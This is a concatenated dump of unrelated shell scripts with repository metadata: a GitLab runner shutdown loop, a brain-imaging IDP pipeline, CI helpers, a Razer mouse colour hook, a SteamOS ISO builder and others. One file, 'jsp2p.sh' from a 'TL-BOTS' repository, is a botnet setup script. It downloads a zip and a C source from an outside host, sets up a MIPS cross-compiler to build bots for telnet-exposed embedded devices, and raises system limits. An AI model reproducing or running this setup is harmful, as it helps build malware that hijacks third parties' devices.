for runner in ${EXISTING_RUNNERS}; do
current_token=`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/${runner}" | \
jq -re ".token"`
if [ "${current_token}" = "${RUNNER_TOKEN}" ]
then
RUNNER_ID=${runner}
break
fi
done
echo "Runner with token ${RUNNER_TOKEN} has ${RUNNER_ID} id"
if [ "${RUNNER_ID}" != "" ]
then
while [ "`curl --header "PRIVATE-TOKEN: ${PERSONAL_ACCESS_TOKENS}" "${URL}/runners/${RUNNER_ID}/jobs?status=running" | jq -re '.[].id'`" != "" ]
do
echo "Some jobs are still in progress"
sleep 5
done
fi
echo "No jobs are running at the moment. Shutting down the runner"
# Sleep for 60 seconds to make sure that runner finished processing
sleep 60
| true |
0897dc2df5d8e10b1a363582b0d599e96a4c58c7 | Shell | rebeccaemma24/ABCD_IDP_Processing | /run_IDP_extraction.sh | UTF-8 | 3,407 | 3.1875 | 3 | [] | no_license | #!/bin/bash
# extract IDPs into text files necessary- this is one long textfile of numbers for each subj :)
# Accompanying scripts: struct_IDPs.sh microIDPs.sh , concat_IDPs.sh
# *** AVERAGE TRACT MASKS MUST BE CREATED IN FORM ${structure}_av_mask.nii.gz AND STORED IN IDPdir/xtract_averages ***
# *** USE GET_AVERAGES.SH TO DO THIS STEP IF NOT ALREADY CREATED ***
#----------------------------------
# step 1: load in all subject IDs and set up paths
#----------------------------------
while read line; do
for subj in $line; do #nb in form 'sub-***'
subdir=/share/neurodev/Rebecca/ABCD/derivatives/${subj}/ses-baselineYear1Arm1
T1=${subdir}/T1
T2=${subdir}/T2_FLAIR
diffdir=${subdir}/dwi_fsl
warpdir=${subdir}/xfms
IDPdir=/share/neurodev/Rebecca/ABCD/IDP_extraction
xtractdir=${subdir}/dwi_fsl.xtract/tracts
mkdir -p ${IDPdir}/IDPs/${subj}
#--------------------------------------
# step 2: STRUCTURAL IDPS
#--------------------------------------
cd /share/neurodev/Rebecca/ABCD/derivatives/${subj}
# Generate IDPs using ukbb pipeline script
BB_BIN_DIR=/share/neurodev/Rebecca/ABCD/UK_biobank_pipeline_v_1
templ=${BB_BIN_DIR}/templates
export BB_BIN_DIR templ
bb_IDP=`${FSLDIR}/bin/fsl_sub -q short.q -l ${T1}/logs -N idp_${subj} ${BB_BIN_DIR}/bb_IDP/bb_IDP ${subdir}`
# Put all subjects IDPs in a single file, by calling struct_IDPs
cd ${IDPdir}
${FSLDIR}/bin/fsl_sub -q short.q -l ${IDPdir}/IDPs/${subj}/logs -j ${bb_IDP} -N struct_IDPs sh struct_IDPs.sh ${subdir} ${IDPdir} ${subj}
echo `date` submitted structural IDPs
#--------------------------------------
# step 3: MICROSTRUCTURAL TRACT-SPECIFIC IDPS
#--------------------------------------
#----------------------------------
# 3i: prepare dti/dki
#----------------------------------
# get radial diffusivity map (L2+L3)/2
rd=`${FSLDIR}/bin/fsl_sub -q short.q -l ${subdir}/dti/logs ${FSLDIR}/bin/fslmaths ${subdir}/dti/dti_L2.nii.gz -add ${subdir}/dti/dti_L3.nii.gz -div 2 ${subdir}/dti/dti_RD.nii.gz`
# threshold dki_kurt data to be between 0 and 5
dki_thr=`${FSLDIR}/bin/fsl_sub -q short.q -l ${subdir}/dki/logs -j ${rd} ${FSLDIR}/bin/fslmaths ${subdir}/dki/dki_kurt.nii.gz -thr 0 -uthr 5 ${subdir}/dki/dki_kurt_thr.nii.gz`
#----------------------------------
# 3ii: warp average tract masks into subj diffusion space
#----------------------------------
mkdir -p ${subdir}/dwi_fsl.xtract/av_masks_native
for structure in ac af_l af_r ar_l ar_r atr_l atr_r cbd_l cbd_r cbp_l cbp_r cbt_l cbt_r cst_l cst_r fa_l fa_r fma fmi fx_l fx_r ifo_l ifo_r ilf_l ilf_r mcp mdlf_l mdlf_r or_l or_r slf1_l slf1_r slf2_l slf2_r slf3_l slf3_r str_l str_r uf_l uf_r vof_l vof_r; do
tract_stats=`${FSLDIR}/bin/fsl_sub -q short.q -j ${dki_thr} -l ${IDPdir}/IDPs/${subj}/logs -N tract_stats sh microIDPs.sh ${structure} ${subj} ${subdir} ${IDPdir} ${warpdir} ${diffdir} ${xtractdir} ${IDPdir}/IDPs/${subj}`
done
echo `date` ALL MICRO IDPS EXTRACTED
#----------------------------------
# step 4: COMBINE ALL IDPS TOGETHER
#----------------------------------
# call concat_IDPs, which creates a text file of all micro IDPs, and creates one text file of all structural and micro IDPs for each subject in their folder
# needs: IDP_files directory (the outdir), subj
${FSLDIR}/bin/fsl_sub -q short.q -l ${IDPdir}/IDPs/${subj}/logs -j ${tract_stats} -N concat_IDPs sh concat_IDPs.sh ${IDPdir}/IDPs/${subj} ${subj}
done
done < subj_IDs.txt
| true |
9dffd036445b869d53181d4681d651dd4b816eba | Shell | chazer/docker-toran-proxy | /addkey.sh | UTF-8 | 158 | 2.875 | 3 | [] | no_license | #!/bin/sh
HOST=$(echo "$1:"|cut -d':' -f 1)
PORT=$(echo "$1:"|cut -d':' -f 2)
[ -z "$PORT" ] && PORT=22
ssh-keyscan -p "$PORT" "$HOST" >> keys/known_hosts
| true |
18cc6163499ce1dc05acc61d03420bb11651011e | Shell | stardog-union/stardog-graviton | /ci/create-db.sh | UTF-8 | 455 | 3.140625 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
set -eu
START_DIR=$(pwd)
OUTPUT_DIR=${START_DIR}/OUTPUT
GRAV_EXE=$(ls $OUTPUT_DIR/linux/stardog-graviton-*)
LAUNCH_NAME=$(cat $OUTPUT_DIR/name)
RELEASE_FILE=$OUTPUT_DIR/stardog-$STARDOG_VERSION.zip
export STARDOG_VIRTUAL_APPLIANCE_CONFIG_DIR=$OUTPUT_DIR
LAUNCH_NAME=$(cat $OUTPUT_DIR/name)
python ./ci/create_db.py $OUTPUT_DIR $RELEASE_FILE $GRAV_EXE $LAUNCH_NAME
if [ $? -ne 0]; then
echo "Fail"
exit 1
fi
echo "Success"
exit 0
| true |
83238e3c83072e3316249237e0fd54d18b0244c0 | Shell | momor666/Academic-LabWork | /Operating System/Lab-3/Workout files/input.sh | UTF-8 | 136 | 3.21875 | 3 | [] | no_license | echo "enter e year number: "
read year
echo "$year"
if [ $((year%4)) -eq 0 ]
then
echo "leap year"
else
echo "not a leap year"
fi
| true |
7eff5568c6f3fe966f95415208510d625cb8b7e8 | Shell | bhageena/TL-BOTS | /TL.P2P/P2P.jsp2p/jsp2p.sh | UTF-8 | 2,480 | 3 | 3 | [] | no_license | #!/bin/bash
echo "###############################################################################"
echo "# ___ __________ ____ _______ _____ _______________.___. ___ #"
echo "# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #"
echo "# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #"
echo "# | | \ | / | \/ | \ | \\____ | #"
echo "# |______ / |___\____|__ /\____|__ /____|_ // ______| #"
echo "# \/ \/ \/ \/ \/ #"
echo "###############################################################################"
#########################################
###############UPDATING##################
#########################################
echo "Updating Your Shit"
yum update -y;
#########################################
#############DEPENDENCIES################
#########################################
echo "Setting Up Dependencies For JS P2P Telnet"
yum install curl; yum install screen -y; yum install httpd -y; yum install telnet -y; yum install gcc -y; yum install nano -y; yum install unzip -y; yum install wget; yum install glibc.i686 -y
curl --silent --location https://rpm.nodesource.com/setup | bash -; yum install nodejs -y;
#########################################
###############WGETTING##################
#########################################
echo"Getting Your Net Shit"
mkdir compile;
mkdir telnet;
wget http://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 && tar -vxjf cross-compiler-mips.tar.bz2;
wget http://b.1339.cf/qbrdwgg.zip;
wget http://b.1339.cf/sygnxbv.c;
#########################################
###############ORGANIZING################
#########################################
cd /root/; mv cross-compiler-mips compile;
cd /root/; mv sygnxbv.c compile;
cd /root/telnet/; mv sygnxbv.c cross-compiler-mips;
cd /root/telnet/cross-compiler-mips; mv sygnxbv.c bin
cd /root/; mv qbrdwgg.zip telnet;
cd /root/telnet/; unzip *zip;
cd /root/telnet/; rm -rf qbrdwgg.zip;
cd /root/; rm -rf cross-compiler-mips.tar.bz2;
#########################################
################ULIMIT###################
#########################################
echo "Fixxing The Ulimit"
ulimit -n 999999; ulimit -u 999999
sysctl -w fs.file-max=100000
echo "Done, Your On Your Own Now" | true |
6778e50b4da1a439dfd0b1d7ae7acae1b18dfbfb | Shell | ngyl88-tw/Infra-Guild-2019 | /week2/terraform-playground/resources/init/bootstrap.sh | UTF-8 | 376 | 2.6875 | 3 | [] | no_license | #!/usr/bin/env bash
# bash -c "help set"
# -x: print commands
# -u: errors on unset variables
# -e: exit immediately on error
set -eo pipefail
add-apt-repository ppa:openjdk-r/ppa -y
apt-get update -q # q: quiet (omitting progress indicators)
apt-get install -y openjdk-11-jre-headless
mv /tmp/init/hello.service /etc/systemd/system/hello.service
systemctl start hello
| true |
5bfe4a9fab66e414224a5a12e463d65d75724aa8 | Shell | paulpeng-popo/RSA | /shell-script/KGC.sh | UTF-8 | 282 | 3.328125 | 3 | [] | no_license | #!/bin/bash
# Check openssl is installed
if ! command -v openssl &> /dev/null
then
sudo apt install openssl -y
fi
KEY_LEN=2048
KEY_NAME=key
# Gen pri_key
openssl genrsa -out ${KEY_NAME}.pem ${KEY_LEN}
# Gen pub_key
openssl rsa -in ${KEY_NAME}.pem -pubout > ${KEY_NAME}.pub
| true |
da234ca5dcaa6bcc7b6bd814f6bd1cb12a70eea7 | Shell | feizeikesi/openstack | /openstack-cinder-compute.sh | UTF-8 | 1,522 | 2.8125 | 3 | [] | no_license | #!/bin/bash
#设置环境变量
DEV=/dev/sda
MY_IP=192.168.0.155
yum install -y lvm2
systemctl enable lvm2-lvmetad.service
systemctl start lvm2-lvmetad.service
pvcreate $DEV
vgcreate cinder-volumes $DEV
cp /etc/lvm/lvm.conf{,.$(date +%s).bak}
sed -i '141a filter = [ "a/sda/", "r/.*/"]' /etc/lvm/lvm.conf #在141行后添加
yum install -y openstack-cinder targetcli python-keystone
cp /etc/cinder/cinder.conf{,.$(date +%s).bak}
echo '
[DEFAULT]
transport_url = rabbit://openstack:'$RABBIT_PASS'@controller.yun.tidebuy
auth_strategy = keystone
my_ip = '$MY_IP' #存储节点上管理网络接口的IP地址
enabled_backends = lvm
glance_api_servers = http://controller.yun.tidebuy:9292
[database]
connection = mysql+pymysql://cinder:'$CINDER_DBPASS'@controller.yun.tidebuy/cinder
[keystone_authtoken]
auth_uri = http://controller.yun.tidebuy:5000
auth_url = http://controller.yun.tidebuy:35357
memcached_servers = controller.yun.tidebuy:11211
auth_type = password
project_domain_name = default
user_domain_name = default
project_name = service
username = cinder
password = '$CINDER_PASS'
[lvm]
volume_driver = cinder.volume.drivers.lvm.LVMVolumeDriver
volume_group = cinder-volumes
iscsi_protocol = iscsi
iscsi_helper = lioadm
[oslo_concurrency]
lock_path = /var/lib/cinder/tmp
'>/etc/cinder/cinder.conf
chmod 640 /etc/cinder/cinder.conf
chgrp cinder /etc/cinder/cinder.conf
systemctl enable openstack-cinder-volume.service target.service
systemctl start openstack-cinder-volume.service target.service | true |
a2af8495c6994dd395c7af7ad48ddc7815fe7595 | Shell | prashanth-royal/Shell-Programming | /Selection-programming/leapyear.sh | UTF-8 | 190 | 3.546875 | 4 | [] | no_license | #!/bin/bash -x
echo -n "Enter year (YYYY) : "
read y
a=`expr $y % 4`
b=`expr $y % 100`
if [ $a -eq 0 ] && [ $b -ne 0 ]
then
echo "$y is a Leap Year"
else
echo "$y is not a leap year"
fi
| true |
5272f8729170b59795e39cbcb6f39b13c59f92f8 | Shell | lapy/Hassio-Addons | /mopidy/run.sh | UTF-8 | 654 | 2.96875 | 3 | [
"Apache-2.0"
] | permissive | #!/usr/bin/env bashio
set -e
bashio::log.info 'Update Certificates'
update-ca-certificates
bashio::log.info 'Create media folder if not existing'
mkdir -p /share/mopidy/media
mkdir -p /share/mopidy/playlists
bashio::log.info 'Setup config'
local_scan=$(cat /data/options.json | jq -r '.local_scan // empty')
options=$(cat /data/options.json | jq -r 'if .options then [.options[] | "-o "+.name+"="+.value ] | join(" ") else "" end')
config="/var/lib/mopidy/.config/mopidy/mopidy.conf"
bashio::log.info 'Start Mopidy....'
if [ "$local_scan" == "true" ]; then
mopidy --config "$config" "$options" local scan
fi
mopidy --config "$config" "$options"
| true |
0f40c9d600ff5e719d0c2282b39679af76800c90 | Shell | saimib/serverless-chrome | /packages/lambda/scripts/package-binaries.sh | UTF-8 | 1,680 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/sh
# shellcheck shell=dash
#
# Builds specified or all headless browsers (chromium, firefox) version defined in package.json
#
# Requires Docker, jq, and zip
#
# Usage: ./build-binaries.sh [chromium|firefox] [stable|beta|dev]
#
set -e
cd "$(dirname "$0")/.."
PACKAGE_DIRECTORY=$(pwd)
packageBinary() {
BUILD_NAME=$1
CHANNEL=$2
cd "$PACKAGE_DIRECTORY/builds/$BUILD_NAME"
DOCKER_IMAGE=headless-$BUILD_NAME-for-aws-lambda
VERSION=$(jq -r ".$CHANNEL" version.json)
BUILD_PATH="dist/$BUILD_NAME"
ZIPFILE_PATH="$CHANNEL-headless-$BUILD_NAME-$VERSION-amazonlinux-2017-03.zip"
if [ ! -f "dist/$ZIPFILE_PATH" ]; then
echo "Packaging $BUILD_NAME version $VERSION ($CHANNEL)"
mkdir -p "$BUILD_PATH"
# Extract binary from docker image
docker run -dt --rm --name "$DOCKER_IMAGE" "adieuadieu/$DOCKER_IMAGE:$VERSION"
docker cp "$DOCKER_IMAGE":/bin/headless-"$BUILD_NAME" "$BUILD_PATH"
docker stop "$DOCKER_IMAGE"
# Package
cd "$BUILD_PATH"
zip -9 -D "../$ZIPFILE_PATH" "headless-$BUILD_NAME"
cd ../../
# stick a copy in packages' dist/ for tests and local dev
mkdir -p "$PACKAGE_DIRECTORY/dist"
cp "$BUILD_PATH/headless-$BUILD_NAME" "$PACKAGE_DIRECTORY/dist/$CHANNEL-headless-$BUILD_NAME"
# Cleanup
rm -Rf "$BUILD_PATH"
else
echo "$BUILD_NAME version $VERSION was previously package. Skipping."
fi
}
# main script
if [ ! -z "$1" ]; then
packageBinary "$1" "$2"
else
cd "$PACKAGE_DIRECTORY/builds"
for DOCKER_FILE in */Dockerfile; do
packageBinary "${DOCKER_FILE%%/*}" stable
packageBinary "${DOCKER_FILE%%/*}" beta
packageBinary "${DOCKER_FILE%%/*}" dev
done
fi
| true |
53ac4e9a76bd9a293c5b743b640d7b5b451bff23 | Shell | maxwell2861/packer | /package/linux/role/bastion/awsEC2-Query.sh | UTF-8 | 1,470 | 3.21875 | 3 | [] | no_license | #!/bin/bash
ALERTMsg(){
if test "$1" -ne 0
then echo "Warn: [LineNum: $2] - [ $3 ] - did not complete successfully" >&2; exit $1;
fi
}
[[ ! -f /usr/bin/aws ]] && ALERTMsg "1" $LINENO "CHECK: /usr/bin/aws";
[[ -e /opt/aws ]] && {
source /maxwell/set/qcon/.aws_credentials
export EC2_HOME=/opt/aws/apitools/ec2
export EC2_BIN=$EC2_HOME/bin
export PATH=$PATH:$EC2_BIN
}
#LOGD=`pwd`
LOGD="${HOME}/.econ"
mkdir -p ${LOGD}
LOGF=$LOGD/EC2QueryRES.log
ERRF=$LOGD/EC2QueryRES.err
WORF=$LOGD/EC2QueryRES.work.log
QFIL1="Name=tag:Env,Values=$1"
QFIL2="Name=instance-state-name,Values=running"
QSTR='Reservations[].Instances[?Platform==`null`].[InstanceType,Tags[?Key==`Name`].Value[],PrivateIpAddress]'
QCHK=`aws ec2 describe-instances --output text --query $QSTR`
QLEN=`echo $QCHK | awk '{ print length }'`
if test $QLEN -gt 0
then
[[ -f $LOGF ]] && rm -rf $LOGF && touch $LOGF > /dev/null 2>&1
[[ -f $ERRF ]] && rm -rf $ERRF && touch $ERRF > /dev/null 2>&1
aws ec2 describe-instances --filters $QFIL1 $QFIL2 --output text --query $QSTR | sed '$!N;s/\n/ /' | sort -k 3 > $LOGF 2> $ERRF &
wait
FRCNT=($(cat $LOGF | wc -l));
[[ $FRCNT -le 9 ]] && FWCNT=1;
[[ $FRCNT -ge 10 ]] && FWCNT=2;
nl -nrz -w$FWCNT $LOGF > $WORF;
ALERTMsg "0" $LINENO "CHECK: QSTR";
else
ALERTMsg "1" $LINENO "CHECK: QSTR";
fi
| true |
37338a321aa3c04f931ad3a2cc53ff1508b0cbf5 | Shell | cr3m/malkoo | /Provision/VM_config/config-remnux.sh | UTF-8 | 1,008 | 2.5625 | 3 | [] | no_license | # Setting up REMnux
# Power -> Blank screen to never
# Install VirtualBox Guest Additions:
sudo mount /dev/cdrom /mnt
sudo /mnt/VboxLinuxAdditions.run
reboot
# Switch to internal net:
sudo sed -i 's/dhcp/static\n\taddress 172.27.0.1\n\tnetmask 255.255.255.0/g' /etc/network/interfaces
sudo ifdown eth0
sudo ifup eth0
ifconfig
# Back to bridge
sudo sed -i 's/static/dhcp/g' /etc/network/interfaces
sudo sed -i 's/\tnetmask 255.255.255.0//g' /etc/network/interfaces
sudo sed -i 's/\taddress 172.27.0.1//g' /etc/network/interfaces
sudo ifdown eth0 && sudo ifup eth0 && ifconfig
# Start ssh on boot:
sudo sed -i 's/exit 0/\/etc\/init.d\/ssh start\nexit 0/g' /etc/rc.local
sudo chmod +x /etc/rc.local
# Vagrant
# Zero out free space on hard drive
# Make sure VM nic1 is in NAT mode
# Make sure SSH starts on boot
# No firewalls up
# vagrant package --base <vm_name> --vagrantfile /path/to/Vagrantfile --output <new_name.box>
# vagrant box add /path/to/new_name.box --name <new_name>
# vagrant up
| true |
85ab92a6ecd25759878ff0b5527ab8d4ca004985 | Shell | BlankOn/blankon-installer | /tests/setup-fs | UTF-8 | 580 | 3.09375 | 3 | [
"FSFAP"
] | permissive | #!/bin/bash
set -x
set -e
pushd `dirname $0`
ROOTFS=/tmp/setup-fs
mkdir -p $ROOTFS
. ./functions
### Initialization
mkdir -p $ROOTFS/live/image/live
cat << @@EOF > $ROOTFS/live/image/live/packages-to-remove
p1
p2
p3
@@EOF
mkdir -p $ROOTFS/tmp
echo "1 testuser" > $ROOTFS/tmp/user-setup
echo "testuser:testpasswd" > $ROOTFS/tmp/user-pass
cat << @@EOF > $ROOTFS/tmp/user-info
long name
room
work
home
@@EOF
echo "testhostname" > $ROOTFS/tmp/hostname
mkdir -p $ROOTFS/target/etc/
### Test
. ../scripts/b-i-setup-fs
### Checking
check_file $ROOTFS/_removed "p1 p2 p3"
popd
| true |
8612d12f4c68f0a7899f6182f3b317e997928a6d | Shell | ChickTechRDU/rpi-wordpress-screen | /files/bin/atestprocess.sh | UTF-8 | 276 | 3.203125 | 3 | [] | no_license | #!/bin/bash
if [ "$#" -ne 1 ]; then
echo "${0} start|stop"
exit 1
fi
if [ "${1}" == "start" ]; then
while /bin/true; do
sleep infinity
done &
elif [ "${1}" == "stop" ]; then
pkill -f atestprocess
else
echo "${0} start|stop"
exit 1
fi
| true |
17c88bab844f273f763556e2dfc031fa80863d4a | Shell | cmarat/LDBC-MMB | /driver/QE/runWorkload.sh | UTF-8 | 2,399 | 3.71875 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
TIMEFORMAT='%3R'
if [ -z "$1" -o -z "$2" -o -z "$3" -o -z "$4" ]
then
echo "Usage: runWorkload.sh [Workload File] [SPARQL Endpoint URL] [Result Dir] [Log File]"
exit 1
fi
if [ -d $3/QE ]
then
echo "Directory: $3/QE already exits. Will not overwrite, exiting."
exit 1
else
mkdir $3/QE
fi
LOG_FILE=$4
function log () {
echo `date` : "$0" : "$1" >> $LOG_FILE
}
GRAPHS='http://ops.rsc.org
http://www.conceptwiki.org
http://www.ebi.ac.uk/chembl
http://linkedlifedata.com/resource/drugbank'
while read TYPE INPUT LENS LIMIT
do
XML=`./getMappingsForURI.sh $INPUT $LENS $2 $3/QE/ $4`
log "getMappingsForUri.sh response:"
log "$XML"
log "End getMappingsForUri.sh response."
FROM_CLAUSE=`cat .from_clause.tmp`
PROP_PATH=`cat .prop_path.tmp`
if [ "$TYPE" == "C" ]
then
QUERY=`sed -e "s,FROM_CLAUSE,$FROM_CLAUSE
," -e "s,PROP_PATH,$PROP_PATH," -e "s,PAGE_SIZE,$LIMIT," ../../queries/QE/compoundPharma.sparql`
elif [ "$TYPE" == "T" ]
then
QUERY=`sed -e "s,FROM_CLAUSE,$FROM_CLAUSE
," -e "s,PROP_PATH,$PROP_PATH," -e "s,PAGE_SIZE,$LIMIT," ../../queries/QE/targetPharma.sparql`
else
echo "ERROR: Unknown instance type: $TYPE"
exit
fi
for graph in $GRAPHS
do
URIS=`echo "$XML" | grep "$graph" -A 1 | sed -n 's,.*<binding name="uri"><uri>\(.*\)</uri></binding>,\1,p'`
if [ -z "$URIS" ]
then
echo 0 >> $3/QE/mappings_count_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
echo NULL >> $3/QE/mappings_URIs_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
QUERY=`echo "$QUERY" | sed "s,GRAPH_${graph}_VALUES,'No mappings found',"`
else
echo "$URIS" | wc -l >> $3/QE/mappings_count_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
echo `echo "$URIS" | tr '\n' ' '` >> $3/QE/mappings_URIs_`echo $graph | sed -e 's,http://,,' -e 's,/,_,g'`.txt
RDF_URIS=`echo "$URIS" | sed -e 's,^ *,<,' -e 's, *$,>,' | tr '\n' ' '`
QUERY=`echo "$QUERY" | sed "s,GRAPH_${graph}_VALUES,$RDF_URIS,"`
fi
done
log "CONSTRUCT query:"
log "$QUERY"
log "End construct query"
RDF=$({ time curl --data-urlencode "query=$QUERY" "$2" 2>/dev/null ; } 2>> $3/QE/response_times_pharmacology.txt)
log "RDF response received"
log "$RDF"
log "End RDF response"
rapper -c -i guess - base <<< "$RDF" 2>&1 | grep returned | sed 's,.* \([0-9][0-9]*\) .*,\1,' >> $3/QE/triple_count_pharmacology.txt
done < <(grep -v "^#" $1)
rm .*.tmp
| true |
ddd4bef7c2d943fc04b0b8aeb48faf046f3439c3 | Shell | xa4ypiva/TM | /tm_rm_weekly | UTF-8 | 402 | 3.21875 | 3 | [] | no_license | #!/bin/bash
function FindOldFolders() {
folders=($(ls $1 | sort -V | grep '[0-9-]'))
folders=(${folders[@]/#/"$1/"})
dirsNum=${#folders[@]}
[[ $dirsNum -gt $dirsRemainNum ]] && dirsRemoveNum=$(($dirsNum - $dirsRemainNum)) || dirsRemoveNum=0
echo ${folders[@]:0:$dirsRemoveNum}
}
dst='/mnt/mSATA/data/backups'
dirsRemainNum=7
rm -rf $(FindOldFolders $dst/home)
rm -rf $(FindOldFolders $dst/root)
| true |
8504ddb2f91bdc4b403d747cc46b332d2470184f | Shell | isao/shell | /misc/setmodes.sh | UTF-8 | 574 | 4.0625 | 4 | [] | no_license | #!/bin/sh
# permissions to apply: X flips executable bits on dirs only
mode='ug=rwX,o='
#input
owners=$1
shift
paths=$@
#usage
abort()
{
cat <<USAGE >&2
usage: `basename $0` <ownership> <path1> [... <path2>...]
description: recursively set user/group ownership and permissions
error: $1
USAGE
exit $2
}
#checks
[[ -z $owners ]] && abort 'missing ownership parameter, like "root:b2user"' 1
[[ -z $paths ]] && abort 'missing path parameter(s)' 2
for i in $paths
do
[[ ! -w $i ]] && abort "can't write to $i" 3
done
#do it
chown -R $owners $paths
chmod -R $mode $paths
| true |
ba8bba7652dc06ebedb54764e6aab486441118bc | Shell | CleyFaye/daocmapp | /MAPPER_M/MAPALL.SH | UTF-8 | 1,303 | 3.234375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/sh
# This is what I use to generate the maps on my website
# (see http://www.randomly.org/projects/mapper).
# Placed in the public domain.
# Oliver Jowett <oliver@randomly.org> 28/10/2002
#for jeux in camelot Shrouded_Isles; do
#jeux=Shrouded_Isles
jeux=Camelot
source=d:\\mythic\\$jeux
bindir=.
font=.\\6x12-ISO8859-1.pil
set -e
mkdir -p out work
#~ rm -f polys/*.*
zonesA=`python zonelist.py -gamepath $source -region 001 -simple`
zonesM=`python zonelist.py -gamepath $source -region 100 -simple`
zonesH=`python zonelist.py -gamepath $source -region 200 -simple`
zonesSIA=`python zonelist.py -gamepath $source -region 051 -simple`
zonesSIM=`python zonelist.py -gamepath $source -region 151 -simple`
zonesSIH=`python zonelist.py -gamepath $source -region 181 -simple`
zonesHA=`python zonelist.py -gamepath $source -region 002 -simple`
zonesHM=`python zonelist.py -gamepath $source -region 102 -simple`
zonesHH=`python zonelist.py -gamepath $source -region 202 -simple`
for z in $zonesHA $zonesHM $zonesHH $zonesSIA $zonesSIM $zonesSIH $zonesA $zonesM $zonesH
do
./2z.bat ${z}
./1z.bat ${z}
done
for z in 002 102 202 051 151 181 001 100 200
do
python glue.py -gamepath $source -out work\\region${z}.png -scale 10 -fontpath $font -template work\\map%03d_o.png -region $z >out/region$z.imagemap
done | true |
c07e6aa9c41860ff27b934e95c1f36e602c449e3 | Shell | danmichaelo/dotfiles | /scripts/openssl_get_site_certificate.sh | UTF-8 | 465 | 2.921875 | 3 | [] | no_license | #!/usr/bin/env bash
# ----------------------------------------------------------------------------
# Unofficial Bash Strict Mode
# http://redsymbol.net/articles/unofficial-bash-strict-mode/
set -euo pipefail
IFS=$'\n\t'
# ----------------------------------------------------------------------------
# Usage: openssl_get_site_certificate.sh {domain}
openssl s_client -connect "$1":443 -servername "$1" -showcerts </dev/null 2>/dev/null | openssl x509 -outform PEM
| true |
14d64887b43ed026a065116d9ec834ad0af2602d | Shell | nuclearglow/dotfiles | /linux/.razer/razer_status_code.zsh | UTF-8 | 1,397 | 3.546875 | 4 | [] | no_license | #!/usr/bin/env zsh
# * requires: https://github.com/openrazer
# * docs: https://github.com/openrazer/openrazer/wiki/Using-the-mouse-driver
# * inspired by: https://github.com/michaelmcallister/razer-status-code/blob/master/razer-mouse-status.plugin.zsh
# switch off the logo
for file in /sys/bus/hid/drivers/razermouse/*/logo_matrix_effect_none; do
echo -n -e "off" > $file
done
# set the brightness (0-255)
_set_brightness() {
for file in /sys/bus/hid/drivers/razermouse/*/scroll_led_brightness; do
echo -n -e "$1" > $file
done
}
# set a color to the razer mouse (use the local vars)
_set_color() {
for file in /sys/bus/hid/drivers/razermouse/*/scroll_matrix_effect_static; do
echo -n -e "$1" > $file
done
}
# custom colors (write 3 bytes)
local GREEN='\x00\xA9\x00'
local ORANGE='\xFF\x55\x00'
local RED='\xCC\x00\x00'
# get the exit status, set the color and brightness
razer_mouse_status_code() {
local exit_status="${1:-$(print -P %?)}";
case $exit_status in
0)
_set_brightness 50
_set_color $GREEN
;;
1)
_set_brightness 255
_set_color $ORANGE
;;
127)
_set_brightness 255
_set_color $RED
;;
-1)
_set_brightness 255
_set_color $RED
;;
*)
_set_brightness 100
_set_color $ORANGE
;;
esac
}
# set as zsh precmd
precmd_functions+=(razer_mouse_status_code)
| true |
fca84d9898249fb012718f0b768239785c72f0ab | Shell | esprite/steamos-installer | /gen.sh | UTF-8 | 4,355 | 3.65625 | 4 | [] | no_license | #!/bin/sh
BUILD=./buildroot
APTCONF=./ftparchive/apt-ftparchive.conf
APTUDEBCONF=./ftparchive/apt-ftparchive-udeb.conf
CACHEDIR=./cache
DISTNAME=alchemist
ISOPATH="."
ISONAME="yeolde.iso"
#Check dependencies
deps="apt-utils xorriso syslinux rsync wget unzip"
for dep in ${deps}; do
if dpkg-query -s ${dep} >/dev/null 2>&1; then
:
else
echo "Missing dependency: ${dep}"
echo "Install with: sudo apt-get install ${dep}"
exit 1
fi
done
#Make sure our BUILD dir exists
if [ ! -d ${BUILD} ]; then
mkdir -p ${BUILD}
fi
#Download SteamOSInstaller.zip
steaminstallfile="SteamOSInstaller.zip"
steaminstallerurl="http://repo.steampowered.com/download/${steaminstallfile}"
if [ ! -f ${steaminstallfile} ]; then
echo "Downloading ${steaminstallerurl} ..."
if wget -N ${steaminstallerurl}; then
:
else
echo "Error downloading ${steaminstallerurl}!"
exit 1
fi
else
echo "Using existing ${steaminstallfile}"
fi
#Unzip SteamOSInstaller.zip into BUILD
if unzip -u ${steaminstallfile} -d ${BUILD}; then
:
else
echo "Error unzipping ${steaminstallfile} into ${BUILD}!"
exit 1
fi
#Delete 32-bit udebs and d-i, as SteamOS is 64-bit only
#TODO: delete entirely needless binary packages too, maybe we can fit on a CD
echo "Deleting 32-bit garbage from ${BUILD}..."
find ${BUILD} -name "*_i386.udeb" -type f -exec rm -rf {} \;
find ${BUILD} -name "*_i386.deb" | egrep -v "(\/eglibc\/|\/elfutils\/|\/expat\/|\/fglrx-driver\/|\/gcc-4.7\/|\/libdrm\/|\/libffi\/|\/libpciaccess\/|\/libvdpau\/|\/libx11\/|\/libxau\/|\/libxcb\/|\/libxdamage\/|\/libxdmcp\/|\/libxext\/|\/libxfixes\/|\/libxxf86vm\/|\/llvm-toolchain-3.3\/|\/mesa\/|\/nvidia-graphics-drivers\/|\/s2tc\/|\/zlib\/)" | xargs rm -f
rm -fr "${BUILD}/install.386"
rm -fr "${BUILD}/dists/*/main/debian-installer/binary-i386/"
#Copy over updated and added debs
#First remove uneeded debs
debstoremove="pool/non-free/f/firmware-nonfree/firmware-linux-nonfree_0.36+wheezy.1+bsos12_all.deb pool/non-free/f/firmware-nonfree/firmware-realtek_0.36+wheezy.1+bsos12_all.deb pool/main/d/debootstrap/debootstrap_1.0.54.steamos+bsos6_all.deb pool/main/d/debootstrap/debootstrap-udeb_1.0.54.steamos+bsos6_all.udeb"
for debremove in ${debstoremove}; do
if [ -f ${BUILD}/${debremove} ]; then
echo "Removing ${BUILD}/${debremove}..."
rm -fr "${BUILD}/${debremove}"
fi
done
#Delete all firmware from /firmware/
echo "Removing bundled firmware"
